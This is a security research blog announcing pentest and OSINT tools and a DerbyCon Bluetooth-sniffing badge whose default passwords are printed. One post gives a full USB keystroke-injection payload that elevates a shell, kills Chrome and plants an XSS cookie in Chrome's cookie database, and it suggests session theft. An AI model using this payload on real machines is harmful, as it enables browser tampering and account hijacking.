Friday, January 17, 2020

LRL Github: Release Party!

We Been Codin' Like Rabbits.



Lost Rabbit Labs Releases New Tools...
https://github.com/LostRabbitLabs/

It's a new year and we've come out of the rabbit hole to release a few tools and scripts that have assisted us in recent adventures. These tools should all be considered beta and works in progress but worth sharing to error on the side of helping others. In addition, we are making an effort to quickly get our Python 2 scripts upgraded to Python 3 due to the sun-setting . Below you will find more information about the new tools and how to use them. Please contribute, provide feedback, and reach out to us anytime at lostrabbitlabs@gmail.com





About LRL Tools:
The scripts in our repo are meant to supplement existing industry tools, and have a focus on 'Full Spectrum Teaming' (used by teams & rabbits of all colors). The tools were designed to produce rapid result sets which include high amounts of actionable information, in easy to use formats. We share them with the hopes of helping the community evolve tradecraft through providing coding examples, showing usage, and discussing ways to improve them and used techniques going forward. ;)




WisQuashttps://github.com/LostRabbitLabs/wisquas
A simple 'URL Revealer' (fast and lightweight scanner, enumerator, fingerprinter, fuzzer, assessor, and collector). Assists with finding vulnerabilities, anomalies, unique servers, available files/dirs, HTTP methods, and accessible web containers, in addition to auto-decoding headers and cookies.
  • Lang: Python2 - tldextract, urlparse, colorama, base64, binascii, codecs, ssl
  • Purpose: Penetration Testing / URL Scanner
  • Input: Provide one (1) URL with protocol
  • Output: Color coded console output

Example command:       ./wisquas.py -1 "http://www.lost-rabbit.com/"

More information:          New Tool Release: WisQuas



GimmeCookieshttps://github.com/LostRabbitLabs/gimmecookies
Python3 script to generate CSV output files from domain-wide crawl for digital assets (like cookies!). Cookies can be further explored with another LRL tool - AnomalousCookie.
  • Lang: Python3 - sys, socket, subprocess, requests & Sublist3r
  • Purpose: Penetration Testing / Digital Asset Management
  • Input: Provide one (1) domain name
  • Output: CSV output of headers & cookies along with discovered subdomains

Example command:       ./gimmecookies.py lost-rabbit.com

More information:          Github README



nmap2csvhttps://github.com/LostRabbitLabs/nmap2csv
A wrapper for Nmap that outputs port scan results to a CSV file (and an output 'targets.txt' file for use with 'grabbit').
  • Lang: Python3 - uses python-nmap
  • Purpose: Penetration Testing / Network Scanner
  • Input: Network or IP Address in CIDR format
  • Output: CSV output of Nmap scan results & 'grabbit target' file

Example command:       ./nmap2csv.py 192.168.0.0/24

More information:          NEW TOOL RELEASE: nmap2csv



grabbithttps://github.com/LostRabbitLabs/grabbit
Grabbit Like A Rabbit! Grabbit is a Python/Selenium based fuzzy screenshotter (png format). Provide a 'targets.txt' file with host:port (1 per line) and grabbit will provide service info and screenshots for all discovered hosts/ports.
  • Lang: Python2 - requests, socket, sys, pyvirtualdisplay, selemium, os
  • Purpose: Penetration Testing / Fuzzy Screenshotter
  • Input: Provide targets file with one (1) 'host:serviceport' per line
  • Output: 2 directories with PNG screenshots and TXT output of requests

Example command:       ./grabbit.py targets.txt

More information:          NEW TOOL RELEASE: grabbit



domaindoxerhttps://github.com/LostRabbitLabs/domaindoxer
Quickly gather information around a provided 'domain name' in the areas of leaked code/docs/info, malware associations, pastebin dumps, public containers, and general OSINT.
  • Lang: Python3 - uses google search library
  • Purpose: OSINT - Find Data Leakage around a given domain name
  • Input: Provide one (1) domain name
  • Output: URL results from google on the CLI

Example command:     ./domaindoxer.py lost-rabbit.com

More information:       Github README



wabbithttps://github.com/LostRabbitLabs/wabbit
(W)hois (A)sn (B)locklist (B)ulk (I)nquiry (T)ool - Create a CSV output file of Domain name and ASN Whois, and Blocklist status information for multiple domains. Uses URLVOID, SiteAdvisor, Fortiguard, and optionally Google Safe Browsing API4 (requires your own api key).
  • Lang: Python3 - whois, IPWhois, bs4, pysafebrowsing
  • Purpose: OSINT - Bulk Whois/Blocklist Lookup
  • Input: List of targets in a file
  • Output: CSV output of results (1 domain per row)

Example command:     ./wabbit.py targets.txt

More information:       Github README




Thank you to everyone in the community and hacker family who has inspired, contributed, supported, and dedicated themselves to making our world (the physical and virtual) a better place. No matter what color your team is...remember that we are truly on the same team and in this together!


Happy New Year & Happy Hunting!
-- the Lost Rabbits --



Tuesday, January 7, 2020

NEW TOOL RELEASE: grabbit

Grabbit Like A Rabbit!


What is Grabbit? 
Grabbit is a Python/Selenium based fuzzy screenshotter (png format). Provide a 'targets.txt' file with one (1) host:service pair per line and grabbit will provide service infos and screenshots for all discovered hosts/ports.


Where can you find grabbit?

How does it work? 
  1. Performs socket connection to service port and logs output
  2. Performs HTTP request of service port (with screenshot/log)
  3. Performs HTTPS request of service port (with screenshot/log)
  4. Performs additional HTTP/HTTPS requests with a handful of fuzzed payloads with non-standard characters, script tag, and a flood.


Example commands and usage...

./grabbit.py targets.txt



Grabbit Walkthrough


1. Clone the 'grabbit' package from Github...


# git clone https://github.com/lostrabbitlabs/grabbit
# cd grabbit
# chmod 655 grabbit.py

2. Install the following libraries...

pip install pyvirtualdisplay
apt-get install xvfb
wget https://github.com/mozilla/geckodriver/releases/download/v0.18.0/geckodriver-v0.18.0-linux64.tar.gz
tar zxvf geckodriver-v0.18.0-linux64.tar.gz
chmod 655 geckodriver
cp geckodriver /usr/bin/geckodriver


3. Prepare 'targets.txt' file (see 'nmap2csv' for more info)...

NOTE: In the example below IP addresses are used but host names may be used as well (ie: www.lost-rabbit.com:443)


4. Run 'grabbit.py' command on 'targets.txt' file...

# ./grabbit.py targets.txt


5. Grabbit will perform requests on services and log output as well as perform screenshots of all successful requests...



6. When completed, there will be two (2) output directories with results (/services & /screenshots)...

Output of /screenshots directory ('ls' command):


Output of /screenshots directory (GUI):



Output of /services directory:




Monday, January 6, 2020

NEW TOOL RELEASE: nmap2csv

Port scanning to spreadsheets...


What is nmap2csv? 
A wrapper for Nmap (Python3) that outputs port scan results to a CSV file. Also created is a 'targets.txt' file where discovered services are logged one host:service pair per line.


Where can you find nmap2csv?

How does it work? 
Modify the 'nmap2csv.py' file as needed to change 'nmap_args' (default below):

nmap_args = "-sV -T4 "

Provide a network or host (in CIDR notation) to 'nmap2csv.py' and it will perform the following...
  1. Perform Nmap scan
  2. Output CSV file of Nmap results
  3. Output 'targets.txt' file of all discovered services


Example commands and usage...

./nmap2csv.py 10.0.0.0/24


nmap2csv Walkthrough

1. Clone the 'nmap2csv' package from Github...


# git clone https://github.com/lostrabbitlabs/nmap2csv
# cd nmap2csv
# chmod 655 nmap2csv.py

2. Install the following library...


pip3 install python-nmap


3. Modify 'nmap_args' variable as needed...




4. Run 'nmap2csv.py' on desired host/network (be sure to use CIDR notation)...


#./nmap2csv.py 1.3.3.0/24




5. When complete two (2) output files will be created...

  •  NMAP-output-network.csv (all Nmap results)
  •  targets.txt (hostname:port)



6. Using 'cat' to view the CSV file...



7. Opening with Libre Office will allow sorting and filtering...
Select 'Semicolon' as your 'Separator Character':


Sort by port, protocol, service name, version, and more:



8. Also created is 'targets.txt' with all discovered 'host:service' pairs (to be used with 'grabbit.py')...





Friday, December 27, 2019

NEW TOOL RELEASE: WisQuas

Revealing What May Be Hidden...



"Wis Quas strips illusion from creatures hidden by the cloak of invisibility, instantly revealing their position. Nightshade cut many times to form a paper-like sheet, then carved into lace is secured by spider silk. It is glazed, dried in the sun, then crystallized into a shiny powder that must be tossed in the sky over the field of battle as the spell is cast."

What is WisQuas? 
A simple 'URL Revealer' (fast and lightweight scanner, enumerator, fingerprinter, fuzzer, assessor, and collector). Assists with finding vulnerabilities, anomalies, unique servers, available files/dirs, methods, and containers, in addition to auto-decoding headers and cookies.


Where can you find WisQuas?

# git clone https://github.com/LostRabbitLabs/wisquas


How does it work? 
Provide a URL to WisQuas and it will perform the following functions...
  1. Resolve hostname to IP address
  2. Perform ASN lookup on IP address to provide ownership info and possible geolocation
  3. Inventories all received headers and cookies and attempts to auto-decode their values (hex/b64)
  4. Baseline original URL request (with SSL cert info if HTTPS) to compare to all other requests
  5. Tactical fuzzing and enumeration to generate unique errors and reveal layered web services
  6. Inspect robots.txt file if available
  7. Enumerate through possible HTTP Verbs
  8. Perform Host Header Manipulation to detect additional accessible containers


Example commands and usage...

WisQuas on URL using 'Desktop Browser' profile:
./wisquas.py -1 "http://www.lost-rabbit.com/"

WisQuas on URL using 'Mobile Browser' profile:
./wisquas.py -2 "http://www.lost-rabbit.com/"

WisQuas on URL using custom 'host header' on requests:
./wisquas.py -1 "http://www.lost-rabbit.com/" customhostname

Create a PDF report from output (requires additional software):
./wisquas.py -1 "http://lost-rabbit.com/" > lost-rabbit.com.txt ; cat lost-rabbit.com.txt | aha -b | wkhtmltopdf - lost-rabbit.com.pdf



WisQuas Walkthrough



1. Clone the 'WisQuas' package from Github...



2. You may need to do the following to install the 'tldextract' library...
# pip install tldextract --upgrade


3. Run 'WisQuas' on desired URL (be sure to include trailing slash)...
#./wisquas.py -1 "http://www.angry_monkey.com/"


4. Analyze the results to reveal information about your URL...


WisQuas will connect to the target URL, and gather information about the original request. Collected headers and cookies will be analyzed and auto-decoded (if they are detected to be Hex or Base64).


In our example above, there is a cookie and a header that contain a Base64 encoded string, that were auto-decoded by WisQuas (highlighted with bright green text).



Original request information and totals, along with final landing page are displayed. Below that, you will find columnized, colorized output of tactical payload requests. Easily find patterns in similar types of requests, identify WAFs, discover hidden web servers and content, and confirm default installations and technologies used within a URL and its web services.

WEB RESPONSE COLOR CODES:
200 = GREEN (Successful request)
40x = YELLOW (Not authorized)
404 = WHITE (Not found)
414 = BLUE (Flooded)
50x = RED (Major Error)


The contents of the discovered 'robots.txt' file is displayed next for review. Available HTTP Verb requests are validated followed by 'Host Header Manipulation' attempts using a small list of custom hostnames.


Certain response code combinations, number of cookies and headers, and content-length can provide insight as to specific software or techniques in use, and may offer a clue on how to further communicate with the system.

More on that soon...until then...

If you have any questions or comments you can reach out to us at  lostrabbitlabs@gmail.com.




Tuesday, December 25, 2018

COOKIE BAKING: WHID-Injected Cookies

Baking up some holiday WHID-Injected Cookies...


Just in time for the holidays...LostRabbitLabs recently updated the cookie fuzzing tool "Anomalous Cookie" and rabbit-holed it's way into a new attack vector called "Cookie Baking".

What is Cookie Baking?
Cookie Baking is the technique of creating or modifying a cookie in a users' local Cookie Jar. This includes stuffing with malicious payloads, affiliate tags, fuzz-strings and more. Cookie Baking also provides a delivery method for targeting 'Self-XSS'  vulnerabilities, allowing them to be exploited.


Epic Holiday Cookie Baking...

If you would like to read more about 'Cookie Baking' and how it has been recently used, check out the blog "Epic Holiday Cookie Baking" at the Coalfire Labs website (link below):



Let's take the example XSS vulnerability discussed from "Epic Holiday Cookie Baking" and create a WHID Injector payload that can be used in our ingredients list.


MERRY CHRISTMAS from LostRabbitLabs...below you will find the full recipe for 'WHID-Injected Cookies'. >8-P



.-= WHID-Injected Cookies =-.

INGREDIENTS:
---------------------------------------------
  1.  1 x WHID-Injector (https://github.com/whid-injector/WHID)
  2.  1 x 'target' computer (in our 'case'...a Windows system)
  3.  1 x Vulnerable Cookie (using '_epicSID' from the example above)
  4.  1 x 'CookieBaker-WHID.txt' payload file (found below)

OPTIONAL:
      1 x WHID-Injector to Motherboard adapter (WI-to-MB) -  pictured below

NOTE: If you can 'Hide Yo' WHID' inside the 'target case', this will add persistence to your 'Cookie Baking'!

 
 


=============================================
=============================================

 'CookieBaker-WHID.txt'
  (save contents below to file - to be uploaded to your WHID Injector)

=============================================
=============================================

Delay
Delay
Delay
Press:131+114
PrintLine:powershell Start-Process cmd.exe -Verb runAs
Delay
Press:130+121
Delay
PrintLine:taskkill /im chrome.exe* /f
DelayPrintLine:powershell
Delay
PrintLine:Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Delay
PrintLine:Install-Module PSSQLite -Force
Delay
PrintLine:set-executionpolicy remotesigned
Delay
PrintLine:Import-Module PSSQLite
Delay
PrintLine:$Database = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Delay
PrintLine:$query = "INSERT INTO cookies
(creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,encrypted_value,firstpartyonly) VALUES  ('13186874114525467','.epicgames.com','_epicSID','kpjak%3c%2fscript%3e%3cScRiPt%3ealert(1)%3c%2fScRiPt%3efbu5ubf6b6ce405264df19ea1394b58aba4d0','/','0','0','1','13386874114525467','0','1','0',NULL,'0')"
Delay
PrintLine:Invoke-SqliteQuery -DataSource $Database -Query $query
Delay
PrintLine:exit
Delay
PrintLine:exit

=============================================
=============================================

DIRECTIONS:
---------------------------------------------
  1. Plug 'WHID-Injector' into 'target' system
  2. Connect to WIFI network on pre-configured access-point of WHID-Injector
  3. Navigate to http://192.168.1.1 (or your custom pre-configured network


     4. Choose 'Upload Payload' and select our newly created 'CookieBaker-WHID.txt' file
     5. From the main menu choose 'Cookie-Baker-WHID.txt' from the payload list


     6. Click on 'Run Payload' button to run Cookie Baker on target system


    7. Target exploited. Eat carrots. The cookie payload above shows a Proof-of-concept XSS injection attack vector and payload but you will need to create the full working payload yourself! Will you steal session cookies, BeEF hook them or create a more clever client-side attack not yet seen?




Next Steps...


  1. Update 'Anomalous Cookie' as needed with better payloads/techniques
  2. Create Metasploit module for 'Cookie Baking' framework
  3. Catalog all known vulnerable cookies and create shared database
  4. Investigate 'Affiliate Fraud' possibilities




                                           ...and a Happy New Year!



Saturday, October 13, 2018

DERBYCON VIII: Bluetooth DeMystifier

How to make a wearable Raspberry Pi...


LostRabbitLabs created five (5) 'Bluetooth DeMystifiers' and brought them to DerbyCon to share. This page will serve as the howto and manual for those who have the badge and those who would like to build one. All parts needed to build one along with instructions on how to use will be listed below. If you would like a copy of the original SDCard image (RaspberryPI Wireless Zero) let me know and I will provide the link. Code will be posted to our Github soon.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What is a Bluetooth DeMystifier?
Using a Raspberry PI Zero Wireless tucked in a bag (making it a 'Hacky Sack' - thank you pancho for the great name)...it is a bluetooth enumerator, logger, identifier, sniffer, collector & plotter with ssh & web interfaces for admin access. With the DeMystifier you can...identify bluetooth/BLE devices around you, plot their signals over time providing real-time proximity data, and collect stats on Top Mac Addresses and Vendors observed. This can assist with locating lost devices, detecting if you are being followed, and give some insight into the Bluetooth Darknet that exists all around us.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What you will need:
1. Raspberry PI Wireless Zero
2. Adafruit PiTFT 2.2" HAT Mini Kit - 320x240 2.2"
3. GPIO headers (for connecting PI to PiTFT)
4. Adafruit PowerBoost 1000C & one (1) on/off switch
5. 3.7v 2000mAh Lithium Ion Battery
6. One small leathery bag & Paracord



Back and front view of DeMystifier before it goes in the bag! Notice the four (4) buttons on the front below the screen!

Putting things together is pretty easy. Solder headers onto Raspberry Pi. Solder PiTFT to headers (leaving room for access to microUSB ports on the the PI). Connect power wires from Powerboost to Raspberry PI and attach battery. Slide in bag and loop paracord through bag ties. Leather-punky...and done!



How to use:
1. Charge battery (or use microUSB power while charging)
2. Turn on/off switch to ON position (located on back of badge)
3. Device boots up! You should see output and boot-up images (shown below) on the screen followed by the DerbyCon VIII splash screen (pictured above). Be patient and badge may take 1-2 minutes to boot up completely.


4. Using the four (4) buttons on the front of the badge, you can access different bluetooth data being collected/observed.

BUTTON 1:
Displays a graph of the Top 10 most observed Bluetooth Mac Addresses over time. This shows patterns in observed bluetooth traffic, devices and the people/objects who control them. Use for Red-Teaming, Blue-Teaming, Purple-Teaming, Asset management, and curiosity!





BUTTON 2:
Pressing this button will show statistics around total Mac Addresses, vendors and connections observed along with a listing of all devices observed in the last 60 seconds.



The Blueooth DeMystifier uses the open source software package 'Bluetoothctl' to provide some of the data seen in this view.






BUTTON 3:
This shows a real-time, enriched view (in the CSV format) of bluetooth/BLE signals observed complete with timestamp, vendor OUI lookup, and leaked strings.



BUTTON 4:
The Blueooth DeMystifier uses the open source software package 'hcitool' to provide some of the data seen in this view. It provides real-time BLE sniffing. Occasionally the command 'hcitool lescan' displays in I/O error message. Just press the button again...and wish for the best!





How to access the SSH and WEB interfaces:
In order to access the SSH and Web interfaces you will need to modify the existing 'wpa_supplicant.conf' file to use your own wireless network. This can be achieved by mounting the sdcard and modifying the the "/etc/wpa_supplicant/wpa_supplicant.conf" file.

wpa_supplicant.conf:
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
 ssid="YOUR WIFI_SSID"
 psk="YOUR_WPA_KEY"
}

------------------------------------------------
Once your Bluetooth DeMystifier is online...you can log in to SSH by using the following methodology below.

SSH LOGIN:


1. Log in to Raspberry PI using the user 'pi2' and the password 'derbycon'
2. Gain root privileges using the command 'su -' and then using 'derbycon' as the password.
3. All data and important files are in '/home/pi/installs'.
4. Factory reset the DeMystifier (clearing out all bluetooth stats and starting over) by running '/home/pi/installs/clean.sh' and rebooting.

------------------------------------------------

WEB ACCESS:
The web interface for 'Bluetooth DeMystifier' provides additional graphs, logs, and ability to plot any Mac Address you request. Available data includes...

  • Bluetooth Stats - Macs, Vendors, Strings
  • All Discovered Devices (Name/Mac)
  • Discovered Devices Last 5 Minutes (Name/Mac)
  • CSV Version of Log Data
  • Top 10 MACADDRS - Last 10 Minutes
  • Top 10 MACADDRS - All-Time
.
Sample CSV output data shown below...

Use the '/home/pi/installs/tags.txt' file to create MAC-to-TAG translations as well as plot any Mac Address using the request URL below:

http://YOUR_IP_ADDRESS:1337/?macaddr=01:02:03:04:05:06


Thank you DerbyCon!
It was a great DerbyCon and I can't wait to go back next year. Great staff, family and local hospitality (not to mention the great food and drink). To many more!